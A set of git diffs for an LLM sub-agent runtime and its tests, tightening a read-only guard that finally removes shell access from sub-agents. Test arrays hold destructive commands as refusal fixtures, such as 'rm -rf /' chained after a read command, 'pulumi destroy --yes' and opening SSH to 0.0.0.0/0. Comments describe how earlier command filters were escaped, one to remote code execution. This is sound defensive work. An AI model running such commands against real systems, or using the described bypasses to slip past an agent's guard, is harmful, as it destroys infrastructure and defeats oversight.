+        expect(events.some(e => e.lastTool === 'describe_instances')).toBe(true);
     });
 });

--- a/apps/web-ui/lib/agent/subagent.test.ts
+++ b/apps/web-ui/lib/agent/subagent.test.ts
@@ -45,18 +45,19 @@ describe('isReadOnlyForSubagent', () => {
         expect(isReadOnlyForSubagent('describe_instances').allowed).toBe(true);
     });
 
-    it('allows a read-only shell command', () => {
-        expect(isReadOnlyForSubagent('execute_command', { command: 'aws ec2 describe-instances' }).allowed).toBe(true);
+    it('blocks a shell command however read-only it looks', () => {
+        // Sub-agents have no shell at all. Two designs that judged the command
+        // string were escaped, the second to RCE, so the string is never parsed:
+        // the tool name alone decides.
+        const verdict = isReadOnlyForSubagent('execute_command', { command: 'aws ec2 describe-instances' });
+        expect(verdict.allowed).toBe(false);
+        expect(verdict.reason).toMatch(/not available to sub-agents/);
     });
 
     it('blocks a mutative shell command', () => {
         const verdict = isReadOnlyForSubagent('execute_command', { command: 'aws ec2 terminate-instances --instance-ids i-1' });
         expect(verdict.allowed).toBe(false);
-        // Step 6 replaced the shell blocklist with an allowlist, so the reason is
-        // now non-membership ("not a verified read-only operation") rather than a
-        // matched mutative pattern. The refusal itself is what matters.
-        expect(verdict.reason).toMatch(/shell call refused/i);
-        expect(verdict.reason).toContain('terminate-instances');
+        expect(verdict.reason).toMatch(/not available to sub-agents/);
     });
 
     it('blocks a mutative tool name', () => {
@@ -94,7 +95,7 @@ describe('isReadOnlyForSubagent', () => {
 describe('filterReadOnlyTools', () => {
     it('keeps read-only tools and drops the rest', () => {
         const kept = filterReadOnlyTools([readTool, shellRead, writeTool, { name: 'dispatch_agent' }]);
-        expect(kept.map(t => t.name)).toEqual(['describe_instances', 'execute_command']);
+        expect(kept.map(t => t.name)).toEqual(['describe_instances']);
     });
 });
 
@@ -180,80 +181,21 @@ describe('runSubagent', () => {
     });
 });
 
-describe('shell allowlist — proven bypasses of the old blocklist', () => {
-    const REFUSED = [
-        'aws --region us-east-1 ec2 terminate-instances --instance-ids i-1',
-        'aws --profile prod ec2 stop-instances --instance-ids i-1',
-        'aws ec2 "terminate-instances" --instance-ids i-1',
-        "aws ec2 'delete-security-group' --group-id sg-1",
-        'aws ec2 authorize-security-group-ingress --group-id sg-1 --port 22 --cidr 0.0.0.0/0',
-        'aws ecs execute-command --cluster c --task t --command /bin/sh',
-        'aws s3 sync ./evil s3://prod-bucket --delete',
-        'aws s3 cp ./evil.sh s3://prod-bucket/boot.sh',
-        'aws rds restore-db-instance-from-db-snapshot --db-instance-identifier x',
-        'aws kms schedule-key-deletion --key-id k --pending-window-in-days 7',
-        'aws cloudformation cancel-update-stack --stack-name s',
-        'pulumi up --stack prod --yes',
-        'pulumi destroy --yes',
-        'python3 -c import boto3',
-        'rm important.tf',
-        'rm -r /app/data',
-        'kubectl run evil --image=alpine',
-        'kubectl delete pod x',
-        'npm run deploy:prod',
-        'bash deploy.sh',
-        'node ./scripts/wipe.js',
-        'echo pwned > /app/config.json',                 // metacharacter
-        'aws ec2 describe-instances && rm -rf /',         // metacharacter
-        'aws ec2 describe-instances; pulumi destroy',     // metacharacter
-        'aws ec2 describe-instances $(rm -rf /)',         // metacharacter
-    ];
-
-    for (const cmd of REFUSED) {
-        it(`refuses: ${cmd}`, () => {
-            expect(isReadOnlyForSubagent('execute_command', { command: cmd }).allowed).toBe(false);
-        });
-    }
-
-    const ALLOWED = [
-        'aws ec2 describe-instances --output json',
-        'aws --region us-east-1 ec2 describe-instances',
-        'AWS_PROFILE=nucleus_agent_1 aws ec2 describe-instances',
-        'aws --profile p --region r rds describe-db-instances',
-        'aws sts get-caller-identity',
-        'aws cloudwatch get-metric-statistics --metric-name CPUUtilization',
-        'aws logs filter-log-events --log-group-name x',
-        'aws s3 ls s3://bucket',
-        'kubectl get pods -n default',
-        'kubectl describe pod x',
-        'kubectl logs pod/x',
-        'cat /tmp/report.json',
-        'ls -la /tmp',
-        'grep -r error /var/log',
-        'jq .Reservations /tmp/out.json',
-    ];
-
-    for (const cmd of ALLOWED) {
-        it(`allows: ${cmd}`, () => {
-            expect(isReadOnlyForSubagent('execute_command', { command: cmd }).allowed).toBe(true);
-        });
-    }
-
-    it('refuses a bash-like call with no usable command string', () => {
-        // classifyTool fails OPEN on {} and stringifies an array into a
-        // comma-joined string that matches no mutative pattern.
-        expect(isReadOnlyForSubagent('execute_command', {}).allowed).toBe(false);
-        expect(isReadOnlyForSubagent('execute_command', undefined).allowed).toBe(false);
-        expect(isReadOnlyForSubagent('execute_command', { command: ['aws', 'ec2', 'terminate-instances'] } as never).allowed).toBe(false);
-        expect(isReadOnlyForSubagent('execute_command', { command: '' }).allowed).toBe(false);
-        expect(isReadOnlyForSubagent('execute_command', { command: 0 } as never).allowed).toBe(false);
+describe('shell is unavailable to sub-agents', () => {
+    it('refuses every bash-like tool name in any case', () => {
+        for (const name of ['bash', 'shell', 'run_command', 'execute_command', 'Execute_Command', 'EXECUTE_COMMAND']) {
+            const verdict = isReadOnlyForSubagent(name, { command: 'aws ec2 describe-instances' });
+            expect(verdict.allowed).toBe(false);
+            expect(verdict.reason).toMatch(/not available to sub-agents/);
+        }
     });
 
-    it('applies the allowlist to every bash-like tool name, any case', () => {
-        for (const name of ['bash', 'shell', 'run_command', 'EXECUTE_COMMAND', 'Bash']) {
-            expect(isReadOnlyForSubagent(name, { command: 'pulumi destroy --yes' }).allowed).toBe(false);
-            expect(isReadOnlyForSubagent(name, { command: 'aws ec2 describe-instances' }).allowed).toBe(true);
-        }
+    it('drops shell tools from the filtered list', () => {
+        const kept = filterReadOnlyTools([
+            { name: 'describe_instances' }, { name: 'execute_command' },
+            { name: 'bash' }, { name: 'dispatch_agent' }, { name: 'ask_user' },
+        ]);
+        expect(kept.map(t => t.name)).toEqual(['describe_instances']);
     });
 });
 

--- a/apps/web-ui/lib/agent/subagent.test.ts
+++ b/apps/web-ui/lib/agent/subagent.test.ts
@@ -52,7 +52,11 @@ describe('isReadOnlyForSubagent', () => {
     it('blocks a mutative shell command', () => {
         const verdict = isReadOnlyForSubagent('execute_command', { command: 'aws ec2 terminate-instances --instance-ids i-1' });
         expect(verdict.allowed).toBe(false);
-        expect(verdict.reason).toMatch(/mutat/i);
+        // Step 6 replaced the shell blocklist with an allowlist, so the reason is
+        // now non-membership ("not a verified read-only operation") rather than a
+        // matched mutative pattern. The refusal itself is what matters.
+        expect(verdict.reason).toMatch(/shell call refused/i);
+        expect(verdict.reason).toContain('terminate-instances');
     });
 
     it('blocks a mutative tool name', () => {
@@ -173,5 +177,142 @@ describe('runSubagent', () => {
 
         expect(result.status).toBe('done');
         expect(result.report).toContain('AccessDenied');
+    });
+});
+
+describe('shell allowlist — proven bypasses of the old blocklist', () => {
+    const REFUSED = [
+        'aws --region us-east-1 ec2 terminate-instances --instance-ids i-1',
+        'aws --profile prod ec2 stop-instances --instance-ids i-1',
+        'aws ec2 "terminate-instances" --instance-ids i-1',
+        "aws ec2 'delete-security-group' --group-id sg-1",
+        'aws ec2 authorize-security-group-ingress --group-id sg-1 --port 22 --cidr 0.0.0.0/0',
+        'aws ecs execute-command --cluster c --task t --command /bin/sh',
+        'aws s3 sync ./evil s3://prod-bucket --delete',
+        'aws s3 cp ./evil.sh s3://prod-bucket/boot.sh',
+        'aws rds restore-db-instance-from-db-snapshot --db-instance-identifier x',
+        'aws kms schedule-key-deletion --key-id k --pending-window-in-days 7',
+        'aws cloudformation cancel-update-stack --stack-name s',
+        'pulumi up --stack prod --yes',
+        'pulumi destroy --yes',
+        'python3 -c import boto3',
+        'rm important.tf',
+        'rm -r /app/data',
+        'kubectl run evil --image=alpine',
+        'kubectl delete pod x',
+        'npm run deploy:prod',
+        'bash deploy.sh',
+        'node ./scripts/wipe.js',
+        'echo pwned > /app/config.json',                 // metacharacter
+        'aws ec2 describe-instances && rm -rf /',         // metacharacter
+        'aws ec2 describe-instances; pulumi destroy',     // metacharacter
+        'aws ec2 describe-instances $(rm -rf /)',         // metacharacter
+    ];
+
+    for (const cmd of REFUSED) {
+        it(`refuses: ${cmd}`, () => {
+            expect(isReadOnlyForSubagent('execute_command', { command: cmd }).allowed).toBe(false);
+        });
+    }
+
+    const ALLOWED = [
+        'aws ec2 describe-instances --output json',
+        'aws --region us-east-1 ec2 describe-instances',
+        'AWS_PROFILE=nucleus_agent_1 aws ec2 describe-instances',
+        'aws --profile p --region r rds describe-db-instances',
+        'aws sts get-caller-identity',
+        'aws cloudwatch get-metric-statistics --metric-name CPUUtilization',
+        'aws logs filter-log-events --log-group-name x',
+        'aws s3 ls s3://bucket',
+        'kubectl get pods -n default',
+        'kubectl describe pod x',
+        'kubectl logs pod/x',
+        'cat /tmp/report.json',
+        'ls -la /tmp',
+        'grep -r error /var/log',
+        'jq .Reservations /tmp/out.json',
+    ];
+
+    for (const cmd of ALLOWED) {
+        it(`allows: ${cmd}`, () => {
+            expect(isReadOnlyForSubagent('execute_command', { command: cmd }).allowed).toBe(true);
+        });
+    }
+
+    it('refuses a bash-like call with no usable command string', () => {
+        // classifyTool fails OPEN on {} and stringifies an array into a
+        // comma-joined string that matches no mutative pattern.
+        expect(isReadOnlyForSubagent('execute_command', {}).allowed).toBe(false);
+        expect(isReadOnlyForSubagent('execute_command', undefined).allowed).toBe(false);
+        expect(isReadOnlyForSubagent('execute_command', { command: ['aws', 'ec2', 'terminate-instances'] } as never).allowed).toBe(false);
+        expect(isReadOnlyForSubagent('execute_command', { command: '' }).allowed).toBe(false);
+        expect(isReadOnlyForSubagent('execute_command', { command: 0 } as never).allowed).toBe(false);
+    });
+
+    it('applies the allowlist to every bash-like tool name, any case', () => {
+        for (const name of ['bash', 'shell', 'run_command', 'EXECUTE_COMMAND', 'Bash']) {
+            expect(isReadOnlyForSubagent(name, { command: 'pulumi destroy --yes' }).allowed).toBe(false);
+            expect(isReadOnlyForSubagent(name, { command: 'aws ec2 describe-instances' }).allowed).toBe(true);
+        }
+    });
+});
+
+describe('timeout cancellation', () => {
+    it('stops the loop instead of leaving it running', async () => {
+        let laps = 0;
+        const model: any = {
+            bindTools: () => model,
+            invoke: async () => {
+                laps++;
+                await new Promise(r => setTimeout(r, 30));
+                return { content: '', tool_calls: [{ id: `${laps}`, name: 'describe_instances', args: {} }], usage_metadata: { input_tokens: 10, output_tokens: 5 } };
+            },
+        };
+        const tool = { name: 'describe_instances', invoke: async () => 'ok' };
+
+        await runSubagent(SPEC, { model, tools: [tool], budget: { ...BUDGET, subagentMaxIterations: 20, subagentTimeoutMs: 60 } });
+        const lapsAtReturn = laps;
+
+        // If the loop were abandoned rather than cancelled it would keep going.
+        await new Promise(r => setTimeout(r, 300));
+        expect(laps).toBeLessThanOrEqual(lapsAtReturn + 1);
+    });
+
+    it('reports real usage on timeout rather than zeros', async () => {
+        const model: any = {
+            bindTools: () => model,
+            invoke: async () => {
+                await new Promise(r => setTimeout(r, 30));
+                return { content: '', tool_calls: [{ id: '1', name: 'describe_instances', args: {} }], usage_metadata: { input_tokens: 100, output_tokens: 20 } };
+            },
+        };
+        const tool = { name: 'describe_instances', invoke: async () => 'ok' };
+
+        const result = await runSubagent(SPEC, { model, tools: [tool], budget: { ...BUDGET, subagentMaxIterations: 20, subagentTimeoutMs: 80 } });
+        expect(result.tokensIn).toBeGreaterThan(0);
+    });
+});
+
+describe('runSubagent totality', () => {
+    it('does not throw on a malformed budget', async () => {
+        const model: any = { bindTools: () => model, invoke: async () => ({ content: 'x', tool_calls: [] }) };
+        await expect(
+            runSubagent(SPEC, { model, tools: [], budget: undefined as never }),
+        ).resolves.toMatchObject({ status: 'failed' });
+    });
+});
+
+describe('hallucinated tool names', () => {
+    it('refuses a tool that passes the jail but is not in the tool list', async () => {
+        // The second layer's whole purpose: the model invents a name it was never given.
+        const model: any = {
+            bindTools: () => model,
+            invoke: vi.fn()
+                .mockResolvedValueOnce({ content: '', tool_calls: [{ id: '1', name: 'describe_instances', args: {} }], usage_metadata: {} })
+                .mockResolvedValueOnce({ content: 'Could not read it.', tool_calls: [], usage_metadata: {} }),
+        };
+        const result = await runSubagent(SPEC, { model, tools: [], budget: BUDGET });
+        expect(result.status).toBe('done');
+        expect(result.transcript.some(e => e.text.includes('REFUSED'))).toBe(true);
     });
 });

--- a/apps/web-ui/lib/agent/subagent.test.ts
+++ b/apps/web-ui/lib/agent/subagent.test.ts
@@ -181,6 +181,67 @@ describe('runSubagent', () => {
     });
 });
 
+describe('transcript redaction runs before truncation', () => {
+    /** Per-tool output cap inside a sub-agent (subagent.ts). */
+    const CAP = 4000;
+
+    /**
+     * A `lambda get-function-configuration` response comfortably over the cap —
+     * which a real one is, routinely. `BOOTSTRAP` is deliberately NOT secret-shaped:
+     * only the `Environment.Variables` LOCATION rule catches it, and that rule needs
+     * JSON that still parses. Truncate first and the redactor falls through to its
+     * regex path, where the strongest rule does not exist.
+     */
+    function bigLambdaConfig(): string {
+        const vars: Record<string, string> = { BOOTSTRAP: 'hunter2', DB_PASSWORD: 'letmein' };
+        for (let i = 0; i < 120; i++) vars[`PLAIN_SETTING_${i}`] = 'x'.repeat(30);
+        return JSON.stringify({ FunctionName: 'api-worker', Environment: { Variables: vars } });
+    }
+
+    const lambdaRun = async (payload: string) => {
+        const tool = { name: 'get_function_configuration', invoke: vi.fn(async () => payload) };
+        const model = scriptedModel([
+            { content: 'reading the configuration', tool_calls: [{ id: 't1', name: 'get_function_configuration', args: {} }] },
+            { content: 'BOOTSTRAP is set in plaintext.' },
+        ]);
+        const result = await runSubagent(SPEC, { model, tools: [tool], budget: BUDGET });
+        return { result, model };
+    };
+
+    it('keeps the location rule alive on an over-cap payload', async () => {
+        const payload = bigLambdaConfig();
+        expect(payload.length).toBeGreaterThan(CAP);
+
+        const { result } = await lambdaRun(payload);
+        const toolEntry = result.transcript.find(e => e.kind === 'tool')!;
+
+        expect(toolEntry.text).not.toContain('hunter2');
+        // The key survives: an operator must still see that BOOTSTRAP exists.
+        expect(toolEntry.text).toContain('BOOTSTRAP');
+    });
+
+    it('still caps the transcript entry at the per-tool limit', async () => {
+        const { result } = await lambdaRun(bigLambdaConfig());
+        const toolEntry = result.transcript.find(e => e.kind === 'tool')!;
+
+        expect(toolEntry.text.length).toBeLessThanOrEqual(CAP + 3);
+    });
+
+    it('does not change what the sub-agent model sees', async () => {
+        // Redaction is a PERSISTENCE-boundary concern. The location rule redacts
+        // EVERY value under `Variables`, benign ones included — correct for at-rest
+        // storage, wrong for a live agent that has to answer "which function still
+        // points at the deprecated table". The model-visible copy stays raw.
+        const payload = bigLambdaConfig();
+        const { model } = await lambdaRun(payload);
+
+        const messages = model.invoke.mock.calls[0][0] as Array<{ content?: unknown }>;
+        const toolMessage = messages.find(m => typeof m.content === 'string' && (m.content as string).includes('FunctionName'))!;
+
+        expect(toolMessage.content).toBe(payload.slice(0, CAP) + '...');
+    });
+});
+
 describe('shell is unavailable to sub-agents', () => {
     it('refuses every bash-like tool name in any case', () => {
         for (const name of ['bash', 'shell', 'run_command', 'execute_command', 'Execute_Command', 'EXECUTE_COMMAND']) {

--- a/apps/web-ui/lib/agent/subagent.test.ts
+++ b/apps/web-ui/lib/agent/subagent.test.ts
@@ -72,6 +72,16 @@ describe('isReadOnlyForSubagent', () => {
         expect(isReadOnlyForSubagent('dispatch_agent').allowed).toBe(false);
     });
 
+    it('blocks denylisted tools regardless of case', () => {
+        // classifyTool lowercases internally, so once dispatch_agent joins its
+        // READ_ONLY_ALLOWLIST (Task 8) a case-sensitive denylist would let
+        // "Dispatch_Agent" through as allowlisted-read-only — re-enabling
+        // sub-agent recursion. Pin the lowercasing.
+        for (const name of ['Dispatch_Agent', 'DISPATCH_AGENT', 'Ask_User', 'ASK_USER']) {
+            expect(isReadOnlyForSubagent(name).allowed).toBe(false);
+        }
+    });
+
     it('blocks ask_user — no human is reachable inside a tool call', () => {
         expect(isReadOnlyForSubagent('ask_user').allowed).toBe(false);
     });

--- a/apps/web-ui/lib/agent/subagent.ts
+++ b/apps/web-ui/lib/agent/subagent.ts
@@ -24,11 +24,18 @@ export const SUBAGENT_REPORT_MAX_CHARS = 6000;
 const SUBAGENT_TOOL_OUTPUT_MAX_CHARS = 4000;
 
 /**
- * Never available to a sub-agent regardless of what the classifier says.
- * - dispatch_agent: depth cap of 1. Recursion makes cost and latency unbounded.
+ * Never available to a sub-agent, regardless of what classifyTool says.
+ * - dispatch_agent: depth cap of 1; recursion makes cost and latency unbounded.
  * - ask_user: pauses for a human, and no human is reachable inside a tool call.
+ * - shell: two designs for gating a command string were escaped (the second to RCE
+ *   via `s3api get-object` writing an arbitrary local path, then LD_PRELOAD). A
+ *   sub-agent reaches AWS through the structured aws_read tool instead, which builds
+ *   argv itself and never invokes a shell.
  */
-const SUBAGENT_TOOL_DENYLIST = new Set(['dispatch_agent', 'ask_user']);
+const SHELL_TOOL_NAMES = new Set(['bash', 'shell', 'run_command', 'execute_command']);
+const SUBAGENT_TOOL_DENYLIST = new Set([
+    'dispatch_agent', 'ask_user', ...SHELL_TOOL_NAMES,
+]);
 
 export interface SubagentSpec {
     role: string;
@@ -64,112 +71,6 @@ export interface SubagentDeps {
 }
 
 /**
- * Shell commands are ALLOWLISTED, not blocklisted.
- *
- * classifyTool treats any bash-like call that misses its mutative regexes as
- * "read-only bash command" WITH matchedRule: true — so the fail-closed
- * !matchedRule rule never fires for shell. That is adequate for the guard node
- * (a human reviews the call) but not here: a sub-agent runs inside a tool call,
- * which LangGraph cannot interrupt, so nothing downstream can stop the command.
- *
- * An adversarial review escaped the blocklist 23 ways — a flag before the
- * service name, a quote around the verb, a verb missing from the list, or simply
- * a different binary (pulumi, psql, python3). Enumerating mutations is
- * unwinnable; enumerating the reads we actually need is not.
- */
-const SHELL_TOOL_NAMES = new Set(['bash', 'shell', 'run_command', 'execute_command']);
-
-/** Metacharacters that allow chaining, substitution, or redirection out of the allowlist. */
-const SHELL_METACHAR = /[;&|`$><\n\r]/;
-
-/** Binaries a sub-agent may invoke at all. */
-const ALLOWED_SHELL_BINARIES = new Set([
-    'aws', 'kubectl', 'cat', 'ls', 'grep', 'head', 'tail', 'wc', 'jq', 'echo',
-]);
-
-/** AWS operation prefixes that are read-only by CLI convention. */
-const READ_ONLY_AWS_OP_PREFIX = /^(describe|list|get|head|search|lookup|check|batch-get)-/;
-
-/** Read-only AWS operations that do not follow the prefix convention. */
-const READ_ONLY_AWS_OP_EXACT = new Set(['ls', 'filter-log-events', 'query', 'scan', 'help']);
-
-/** Read-only kubectl verbs. */
-const READ_ONLY_KUBECTL_VERBS = new Set([
-    'get', 'describe', 'logs', 'top', 'version', 'api-resources', 'explain',
-]);
-
-/** Strip one layer of surrounding quotes: `aws ec2 "terminate-instances"` must not hide the verb. */
-function unquote(token: string): string {
-    return token.replace(/^['"]|['"]$/g, '');
-}
-
-/**
- * Resolve the command string from a bash-like tool's args. Returns null when the
- * args carry no usable command — an array, a number, an empty object. classifyTool
- * fails open on `{}` and stringifies an array into a comma-joined string that
- * matches no pattern, so both must be refused here.
- */
-export function resolveShellCommand(args?: Record<string, unknown>): string | null {
-    for (const key of ['command', 'cmd', 'input']) {
-        const value = args?.[key];
-        if (typeof value === 'string' && value.trim().length > 0) return value;
-        if (value !== undefined) return null; // present but not a usable string
-    }
-    return null;
-}
-
-/** Allowlist verdict for one shell command string. */
-export function isReadOnlyShellCommand(cmd: string): { allowed: boolean; reason: string } {
-    if (SHELL_METACHAR.test(cmd)) {
-        return { allowed: false, reason: 'command contains shell metacharacters (chaining, substitution, or redirection)' };
-    }
-
-    // Quotes are stripped per token, so splitting on whitespace is sufficient once
-    // metacharacters are already refused.
-    const tokens = cmd.trim().split(/\s+/).map(unquote).filter(t => t.length > 0);
-    // Drop leading VAR=value assignments (`AWS_PROFILE=x aws ...`).
-    while (tokens.length > 0 && /^[A-Za-z_][A-Za-z0-9_]*=/.test(tokens[0])) tokens.shift();
-    if (tokens.length === 0) return { allowed: false, reason: 'empty command' };
-
-    const binary = tokens[0];
-    if (!ALLOWED_SHELL_BINARIES.has(binary)) {
-        return { allowed: false, reason: `binary "${binary}" is not on the sub-agent read-only allowlist` };
-    }
-
-    if (binary === 'aws') {
-        // Walk past global flags AND their values to find <service> then <operation>.
-        // This is what defeated the old regex: it assumed `aws <service> <verb>` adjacency.
-        const positional: string[] = [];
-        for (let i = 1; i < tokens.length; i++) {
-            const token = tokens[i];
-            if (token.startsWith('-')) {
-                // A flag's value is the next token when it is not itself a flag.
-                if (i + 1 < tokens.length && !tokens[i + 1].startsWith('-')) i++;
-                continue;
-            }
-            positional.push(token);
-            if (positional.length === 2) break;
-        }
-        const operation = positional[1];
-        if (!operation) return { allowed: false, reason: 'aws command has no resolvable operation' };
-        if (!READ_ONLY_AWS_OP_PREFIX.test(operation) && !READ_ONLY_AWS_OP_EXACT.has(operation)) {
-            return { allowed: false, reason: `aws operation "${operation}" is not a verified read-only operation` };
-        }
-        return { allowed: true, reason: `aws read-only operation "${operation}"` };
-    }
-
-    if (binary === 'kubectl') {
-        const verb = tokens.slice(1).find(t => !t.startsWith('-'));
-        if (!verb || !READ_ONLY_KUBECTL_VERBS.has(verb)) {
-            return { allowed: false, reason: `kubectl verb "${verb ?? '(none)'}" is not read-only` };
-        }
-        return { allowed: true, reason: `kubectl read-only verb "${verb}"` };
-    }
-
-    return { allowed: true, reason: `read-only utility "${binary}"` };
-}
-
-/**
  * The jail. Fail-closed by design: `classifyTool` returns
  * `{ isMutative: false, matchedRule: false }` for a tool whose name matched no
  * rule at all. In the orchestrator that ambiguity routes to a human; inside a
@@ -188,19 +89,6 @@ export function isReadOnlyForSubagent(
         return { allowed: false, reason: `${name} is not available to sub-agents` };
     }
 
-    // Shell is allowlisted here rather than delegated to classifyTool, whose
-    // bash handling is a blocklist that reports matchedRule: true on a miss.
-    if (SHELL_TOOL_NAMES.has(name.toLowerCase())) {
-        const cmd = resolveShellCommand(args);
-        if (cmd === null) {
-            return { allowed: false, reason: `${name} called without a usable command string` };
-        }
-        const verdict = isReadOnlyShellCommand(cmd);
-        return verdict.allowed
-            ? { allowed: true, reason: verdict.reason }
-            : { allowed: false, reason: `shell call refused: ${verdict.reason}` };
-    }
-
     let classification;
     try {
         classification = classifyTool(name, args);
@@ -217,18 +105,15 @@ export function isReadOnlyForSubagent(
     return { allowed: true, reason: classification.reason };
 }
 
-/** Drop everything a sub-agent may not call, before the model ever sees it. */
+/**
+ * Drop everything a sub-agent may not call, before the model ever sees it.
+ *
+ * Delegates wholly to `isReadOnlyForSubagent` so the two layers cannot disagree:
+ * this function previously hardcoded `execute_command` as a keep-and-gate-later
+ * exception, which is exactly the special case the shell removal deleted.
+ */
 export function filterReadOnlyTools<T extends { name: string }>(tools: T[]): T[] {
-    return tools.filter(tool => {
-        // Lowercased for the same reason as isReadOnlyForSubagent above — the
-        // filtered list and the runtime re-check must agree on case handling.
-        const lower = tool.name.toLowerCase();
-        if (SUBAGENT_TOOL_DENYLIST.has(lower)) return false;
-        // Bash-like tools are judged per call (the command string decides), so keep
-        // them in the list and let the runtime check gate each invocation.
-        if (lower === 'execute_command') return true;
-        return isReadOnlyForSubagent(tool.name).allowed;
-    });
+    return tools.filter(tool => isReadOnlyForSubagent(tool.name).allowed);
 }
 
 function buildSystemPrompt(spec: SubagentSpec): SystemMessage {
@@ -248,7 +133,8 @@ ${spec.expectedOutput}
 - You are READ-ONLY. You cannot create, modify, delete, start, stop, or write anything. If the task appears to need a change, do NOT attempt it — describe the recommended change in your findings and the main agent will carry it out under human approval.
 - You cannot ask the user questions. If something is ambiguous, investigate the most likely interpretation and say what you assumed.
 - You see none of the parent conversation. Everything you need is in the task above.
-- Batch independent read-only calls into a single turn — they run in parallel.
+- You have NO shell. Reach AWS only through aws_read, passing the service and operation separately. Call get_aws_credentials first to obtain a profile name.
+- Batch independent aws_read calls into a single turn — they run in parallel.
 
 ## Output
 

--- a/apps/web-ui/lib/agent/subagent.ts
+++ b/apps/web-ui/lib/agent/subagent.ts
@@ -1,0 +1,256 @@
+/**
+ * Sub-agent runtime — the Claude Code `Task` pattern.
+ *
+ * An ephemeral ReAct loop with its OWN message list. The orchestrator sees only
+ * the returned report, never the raw tool output, which is what keeps the
+ * orchestrator's context (and therefore its per-lap latency) flat.
+ *
+ * Sub-agents are strictly READ-ONLY. LangGraph cannot interrupt inside a tool
+ * call, so a mutation attempted here could never reach the guard node's human
+ * approval gate. Mutations stay on the orchestrator's guarded path.
+ *
+ * Not checkpointed: a sub-agent is not resumable, so a checkpointer would cost a
+ * Postgres write per lap for no benefit.
+ */
+import { AIMessage, HumanMessage, SystemMessage, ToolMessage } from '@langchain/core/messages';
+import { classifyTool } from './tool-classifier';
+import { contentToText, truncateOutput } from './agent-shared';
+import type { SubagentBudgetConfig } from './subagent-budget';
+
+/** ~1500 tokens. Enforced in characters so the bound is deterministic and testable. */
+export const SUBAGENT_REPORT_MAX_CHARS = 6000;
+
+/** Per-tool output cap inside a sub-agent — it never leaves this context. */
+const SUBAGENT_TOOL_OUTPUT_MAX_CHARS = 4000;
+
+/**
+ * Never available to a sub-agent regardless of what the classifier says.
+ * - dispatch_agent: depth cap of 1. Recursion makes cost and latency unbounded.
+ * - ask_user: pauses for a human, and no human is reachable inside a tool call.
+ */
+const SUBAGENT_TOOL_DENYLIST = new Set(['dispatch_agent', 'ask_user']);
+
+export interface SubagentSpec {
+    role: string;
+    task: string;
+    expectedOutput: string;
+}
+
+export interface SubagentTranscriptEntry {
+    kind: 'ai' | 'tool';
+    name?: string;
+    text: string;
+}
+
+export interface SubagentResult {
+    report: string;
+    toolCount: number;
+    tokensIn: number;
+    tokensOut: number;
+    status: 'done' | 'failed';
+    transcript: SubagentTranscriptEntry[];
+}
+
+interface SubagentToolLike {
+    name: string;
+    invoke: (args: Record<string, unknown>) => Promise<unknown>;
+}
+
+export interface SubagentDeps {
+    model: { bindTools?: (tools: unknown[]) => unknown; invoke: (messages: unknown[]) => Promise<unknown> };
+    tools: SubagentToolLike[];
+    budget: SubagentBudgetConfig;
+    onEvent?: (progress: { toolCount: number; tokensIn: number; tokensOut: number }) => void;
+}
+
+/**
+ * The jail. Fail-closed by design: `classifyTool` returns
+ * `{ isMutative: false, matchedRule: false }` for a tool whose name matched no
+ * rule at all. In the orchestrator that ambiguity routes to a human; inside a
+ * sub-agent there is no human, so an unverified tool is refused.
+ */
+export function isReadOnlyForSubagent(
+    name: string,
+    args?: Record<string, unknown>,
+): { allowed: boolean; reason: string } {
+    if (SUBAGENT_TOOL_DENYLIST.has(name)) {
+        return { allowed: false, reason: `${name} is not available to sub-agents` };
+    }
+
+    let classification;
+    try {
+        classification = classifyTool(name, args);
+    } catch (error) {
+        return { allowed: false, reason: `classifier error: ${error instanceof Error ? error.message : String(error)}` };
+    }
+
+    if (classification.isMutative) {
+        return { allowed: false, reason: `mutative call refused: ${classification.reason}` };
+    }
+    if (!classification.matchedRule) {
+        return { allowed: false, reason: `${name} is not on the verified read-only list` };
+    }
+    return { allowed: true, reason: classification.reason };
+}
+
+/** Drop everything a sub-agent may not call, before the model ever sees it. */
+export function filterReadOnlyTools<T extends { name: string }>(tools: T[]): T[] {
+    return tools.filter(tool => {
+        if (SUBAGENT_TOOL_DENYLIST.has(tool.name)) return false;
+        // Bash-like tools are judged per call (the command string decides), so keep
+        // them in the list and let the runtime check gate each invocation.
+        if (tool.name === 'execute_command') return true;
+        return isReadOnlyForSubagent(tool.name).allowed;
+    });
+}
+
+function buildSystemPrompt(spec: SubagentSpec): SystemMessage {
+    return new SystemMessage(`You are a focused read-only investigator working as a sub-agent for a cloud-operations platform.
+
+## Your role
+${spec.role}
+
+## Your task
+${spec.task}
+
+## What to return
+${spec.expectedOutput}
+
+## Constraints
+
+- You are READ-ONLY. You cannot create, modify, delete, start, stop, or write anything. If the task appears to need a change, do NOT attempt it — describe the recommended change in your findings and the main agent will carry it out under human approval.
+- You cannot ask the user questions. If something is ambiguous, investigate the most likely interpretation and say what you assumed.
+- You see none of the parent conversation. Everything you need is in the task above.
+- Batch independent read-only calls into a single turn — they run in parallel.
+
+## Output
+
+When you have gathered enough, reply with your findings as plain text. No preamble, no narration of what you did. Structure it as:
+
+**Findings** — what you established, with concrete evidence (resource ids, metric values, region and account names).
+**Could not determine** — anything you could not establish, and why. Write "Nothing" if everything was resolved.
+
+Be dense. Your reply is consumed by another agent, not a human.`);
+}
+
+function finishReport(text: string, note?: string): string {
+    const body = text.trim() || '(no findings produced)';
+    const withNote = note ? `${body}\n\n[${note}]` : body;
+    return withNote.length > SUBAGENT_REPORT_MAX_CHARS
+        ? `${withNote.slice(0, SUBAGENT_REPORT_MAX_CHARS)}\n\n[TRUNCATED — report exceeded ${SUBAGENT_REPORT_MAX_CHARS} characters]`
+        : withNote;
+}
+
+async function runSubagentLoop(spec: SubagentSpec, deps: SubagentDeps): Promise<SubagentResult> {
+    const { budget } = deps;
+    const allowedTools = filterReadOnlyTools(deps.tools);
+    const toolsByName = new Map(allowedTools.map(t => [t.name, t]));
+
+    const boundModel = deps.model.bindTools
+        ? (deps.model.bindTools(allowedTools) as SubagentDeps['model'])
+        : deps.model;
+
+    const messages: unknown[] = [buildSystemPrompt(spec), new HumanMessage({ content: spec.task })];
+    const transcript: SubagentTranscriptEntry[] = [];
+
+    let toolCount = 0;
+    let tokensIn = 0;
+    let tokensOut = 0;
+    let lastText = '';
+
+    for (let iteration = 0; iteration < budget.subagentMaxIterations; iteration++) {
+        const response = (await boundModel.invoke(messages)) as {
+            content: unknown;
+            tool_calls?: Array<{ id?: string; name: string; args?: Record<string, unknown> }>;
+            usage_metadata?: { input_tokens?: number; output_tokens?: number };
+        };
+
+        tokensIn += response.usage_metadata?.input_tokens ?? 0;
